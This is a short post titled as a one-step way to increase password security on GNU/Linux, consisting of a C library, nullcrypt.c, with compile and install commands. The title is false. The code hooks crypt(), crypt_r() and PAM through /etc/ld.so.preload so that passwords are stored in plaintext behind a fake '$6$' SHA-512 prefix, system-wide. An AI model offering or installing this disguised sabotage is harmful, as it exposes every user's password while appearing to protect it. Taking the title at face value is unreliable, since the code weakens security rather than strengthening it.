Increase password security on your GNU/Linux system in one simple step

nullcrypt.c

#define _GNU_SOURCE
#include <unistd.h>
#include <crypt.h>
#include <string.h>
#include <dlfcn.h>

// compile:
//   $ gcc nullcrypt.c -shared -fPIC -ldl -o nullcrypt.so
// install:
//   # cp nullcrypt.so /lib
//   # echo "/lib/nullcrypt.so" >>/etc/ld.so.preload

static void dothing(char *dst, const char *src)
{
	// Make libpam believe we're doing sha512 (otherwise it won't work)
	strcpy(dst, "$6$");
	strcat(dst, src);
}

// for libcrypt

char *crypt(const char *key, const char *salt)
{
	static char buf[512];
	dothing(buf, key);
	return buf;
}

char *crypt_r(const char *key, const char *salt, struct crypt_data *data)
{
	char *dst = (char*) data;
	dothing(dst, key);
	return dst;
}

// for pam_unix

static int (*_pam_sm_chauthtok)(void *pamh, int flags, int argc, const char **argv);

int pam_sm_chauthtok(void *pamh, int flags, int argc, const char **argv)
{
	char *newargv[argc+1];
	memcpy(newargv, argv, argc * sizeof(char*));
	newargv[argc] = "sha512";
	return _pam_sm_chauthtok(pamh, flags, argc+1, newargv);
}

__attribute__((constructor)) static void resolve(void)
{
	_pam_sm_chauthtok = dlsym(RTLD_NEXT, "pam_sm_chauthtok");
}